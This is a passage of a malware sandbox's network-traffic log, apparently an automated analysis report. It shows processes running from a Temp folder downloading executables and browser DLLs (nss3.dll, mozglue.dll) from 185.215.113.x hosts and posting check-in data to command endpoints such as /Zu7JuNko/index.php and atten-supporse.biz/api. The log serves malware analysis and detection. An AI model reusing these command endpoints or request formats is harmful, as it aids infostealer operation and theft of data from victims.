Dec 9, 2024 08:08:54.957638025 CET	1236	IN	Data Raw: f0 8d 86 00 ff ff ff 3d 00 ff ff ff 77 0a 68 0e e0 ff ff e9 d0 00 00 00 8b 45 08 85 c0 0f 84 c0 00 00 00 8d 9d f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 50 e8 28 f9 07 00 83 c4 0c bf 00 01 00 00 0f 1f 80 00 00 00 00 56 ff 75 0c 53 e8 0f f9 07 00 Data Ascii: =whEhh !P(VuS)9wWuSufDT>\>=t%>>f1h
Dec 9, 2024 08:08:54.957660913 CET	1236	IN	Data Raw: 45 d0 0f 84 a4 00 00 00 89 55 e0 89 5d dc 8b 45 ec 04 01 89 4d d4 0f b6 c8 8a 5d e8 8b 55 f0 8a 24 0a 00 e3 0f b6 f3 8b 55 f0 8a 3c 32 8b 55 f0 88 3c 0a 8b 55 f0 88 24 32 00 e7 0f b6 f7 8b 4d 10 8a 21 8b 4d f0 32 24 31 8b 4d d4 8b 55 e4 88 22 ba Data Ascii: EU]EM]U$U<2U<U$2M!M2$1MU")UtDEU$U<2U<U$2MaM2$1MUbu-]En~uMMUEEM]}7
Dec 9, 2024 08:08:54.958889008 CET	1236	IN	Data Raw: 04 0f 82 3a 03 00 00 0f b6 c9 89 4d ec 31 c0 89 d1 89 7d e4 89 5d dc 66 0f 1f 84 00 00 00 00 00 89 45 e8 8b 55 e4 8b 04 02 89 45 d4 8b 45 e8 8b 55 ec 8d 44 02 01 89 d3 0f b6 c0 8b 7d f0 0f b6 14 07 00 d1 0f b6 f1 8a 34 37 88 34 07 88 14 37 00 d6 Data Ascii: :M1}]fEUEEUD}4747EED}4}4EUEUu}<7}<U2u4EUU}4}
Dec 9, 2024 08:08:54.963598967 CET	1236	IN	Data Raw: 01 cb 8b 52 14 89 95 3c ff ff ff 8b 4e 0c 89 8d a8 fe ff ff 11 d1 8b 46 28 89 85 c8 fe ff ff 01 c3 89 5d d4 8b 46 2c 89 85 cc fe ff ff 11 c1 8b 7e 4c 31 cf 8b 46 48 31 d8 81 f7 8c 68 05 9b 35 1f 6c 3e 2b 89 fb 81 c3 3b a7 ca 84 89 5d dc 89 c6 81 Data Ascii: R<NF(]F,~L1FH1h5l>+;]gu33`tSUSU`UM11UTEEMM11E`tS
Dec 9, 2024 08:08:54.963840961 CET	1148	IN	Data Raw: 5d 80 11 d9 89 4d f0 8b 75 a4 31 ce 89 75 a4 8b 8d 54 ff ff ff 31 c1 89 8d 54 ff ff ff 8b 45 e8 01 f0 89 45 e8 8b 7d c0 11 cf 31 c2 31 fb 89 d0 0f a4 d8 08 0f a4 d3 08 8b 8d 74 ff ff ff 8b 71 68 89 b5 24 ff ff ff 8b 55 b8 01 f2 8b 71 6c 89 b5 5c Data Ascii: ]Mu1uT1TEE}11tqh$Uql\MUMT1M1UMuuM11UMtBpTMRtdEpMxEU1U}1}E
Dec 9, 2024 08:08:56.525239944 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 9, 2024 08:08:56.995142937 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:56 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 9, 2024 08:08:58.850928068 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 9, 2024 08:08:59.288921118 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:59 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 9, 2024 08:09:00.685983896 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 9, 2024 08:09:01.123111010 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:09:00 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49886	185.215.113.16	80	7172	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:49.301661968 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 9, 2024 08:08:50.669265985 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:50 GMT Content-Type: application/octet-stream Content-Length: 2724864 Last-Modified: Mon, 09 Dec 2024 06:19:55 GMT Connection: keep-alive ETag: "67568c0b-299400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 c4 3e 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ @>`Ui` @ @.rsrc`2@.idata 8@quaaapuk@)2):@agtviptv )l)@.taggant@*"r)@
Dec 9, 2024 08:08:50.669970036 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:50.669981003 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:50.672669888 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:50.672682047 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:50.675622940 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:50.675636053 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:50.678602934 CET	1236	IN	Data Raw: 1c 19 03 09 f4 76 04 ce 7c 65 02 46 6d 9b 5f f8 18 b2 69 e8 d9 50 56 a8 a8 2b 38 c7 42 b0 c8 dd d4 9d ae 6c 3e 8e 89 28 25 e6 3f fe 4d 54 f4 c8 89 2c 24 f8 c5 1f f7 c3 7b 4e 01 c2 8b 24 bb da 8d 17 14 08 f4 22 10 20 d8 3b 23 be 69 35 01 59 b6 fe Data Ascii: v\|eFm_iPV+8Bl>(%?MT,${N$" ;#i5Y/B9}\|DtJ^ni;"e9uA-)r/:0YP^ns88W;m?+5Fyzk!C 7?,}8/iE
Dec 9, 2024 08:08:50.678616047 CET	1236	IN	Data Raw: 08 1a 1a 1e 30 1a 1e ea 18 05 a3 fe 72 3d 18 77 ba 45 14 02 ec 50 36 e7 a9 a2 3e 0e 90 5d 0e 09 ba 45 4e e8 1b 7d 52 0b 21 10 90 86 90 1a 5a 08 ba 79 1a 36 ec 61 6a fc dd b6 74 42 b8 3d 76 df e9 3e ae 62 73 99 07 90 90 9d 26 09 fa 2e 8e 56 02 d5 Data Ascii: 0r=wEP6>]EN}R!Zy6ajtB=v>bs&.V@H55~9x(Bn.BtjO.NER}XB.s.1E5H<Ei>H(%Ixhcx]qj}sE#P"I!ofO~P1
Dec 9, 2024 08:08:50.681519985 CET	1236	IN	Data Raw: d1 37 13 0f e6 55 1a db cc 82 ca 08 85 01 0a 7d 7f 10 1c 36 c0 2a 3e af 74 73 49 27 df f5 6f ac d6 42 48 39 7e 96 3c cd 0a 74 ef db 99 2f 4f 9f ca 1d 6e 18 70 80 8b 2a 8a 0d 78 2a db 70 6a 63 02 2a 66 f7 8b 74 5e 11 81 e7 ae 09 f8 ca 33 5a 3d 03 Data Ascii: 7U}6>tsI'oBH9~<t/Onpxpjcft^3Z=hh9E8+Do;B\Rn?t*"03?G#z'DH9,''AN.%%91;kKJR;t Sp:\|H4.#zIsGj
Dec 9, 2024 08:08:50.789498091 CET	1236	IN	Data Raw: 78 62 e3 b2 a2 31 f9 e1 9d b5 ff cc 56 11 3c e9 6d 2a 08 49 6e 31 5a d6 6a 47 e6 2e 71 22 e5 f9 6d 21 60 14 bb 2e ac 9b ed f6 f5 3f cf e0 17 77 b9 db 72 0d d1 7f 22 c6 b9 0f 0c 1d d8 6e 66 14 68 7c 64 0b de 70 5b b7 3a 3a 05 99 2a 84 69 4b da f5 Data Ascii: xb1V<mIn1ZjG.q"m!`.?wr"nfh\|dp[::iK_hkv\|k-/0;)r=*+O7d.#D/$R)tCr=V.^"33a.jtdEA#!0=.o[nVd59f<"+R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49889	185.215.113.43	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:50.341017962 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 33 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013375001&unit=246122658369
Dec 9, 2024 08:08:52.197676897 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49897	34.107.221.82	80	4124	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:51.394543886 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 9, 2024 08:08:52.481367111 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 08:27:46 GMT Age: 81666 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49909	34.107.221.82	80	4124	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:53.607269049 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 9, 2024 08:08:54.702830076 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 08 Dec 2024 12:18:46 GMT Age: 67808 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49910	34.107.221.82	80	4124	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:53.607386112 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 9, 2024 08:08:54.704473972 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 18:50:11 GMT Age: 44323 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49911	185.215.113.43	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:54.317312956 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 9, 2024 08:08:55.654483080 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49921	185.215.113.43	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:57.294259071 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 9, 2024 08:08:58.697329044 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49932	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:09:00.564188957 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 9, 2024 08:09:02.163578987 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:09:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49799	104.21.16.9	443	7172	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:08:21 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-09 07:08:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-09 07:08:22 UTC	1026	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4nhc5vmt6gdqt86qjf83aegskr; expires=Fri, 04-Apr-2025 00:55:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bxe3cxv60q8NRPxZHrpsqE0P1rlxULhVzBUQNGDcpKi0JPFVAAPWDRt%2BUr4%2FnDSfDwu1ccQV%2BLv49dMQ%2BdZ%2BRKaGPx21mbDDXwQF%2FK2cpyGz12a7nx%2BjLz6nT8f3nviS0%2BDx0Dw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef329db7bc843bc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1699&rtt_var=639&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1710603&cwnd=218&unsent_bytes=0&cid=714f1a67ec7abf14&ts=1022&x=0"
2024-12-09 07:08:22 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-09 07:08:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49806	104.21.16.9	443	7172	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:08:23 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-09 07:08:23 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-09 07:08:25 UTC	1020	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c4ijvqpq48d3ubbov8snkk7k77; expires=Fri, 04-Apr-2025 00:55:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EQ%2Fq6Keq2bDach6PaArWV%2Bf8slAzxYOxOv3zrGO8sz%2FlhWUU1uAWV0Zg31vxjqM3tPZ6ls%2BGZbG%2FPdiUFb6g01X1qV1MRMvZIEBAfunSxBWe07qHvsSDRMhT7vYefuWVCLmtGLo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef329e9bfe942d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1591&rtt_var=597&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1830721&cwnd=227&unsent_bytes=0&cid=43342464b48209e3&ts=1411&x=0"
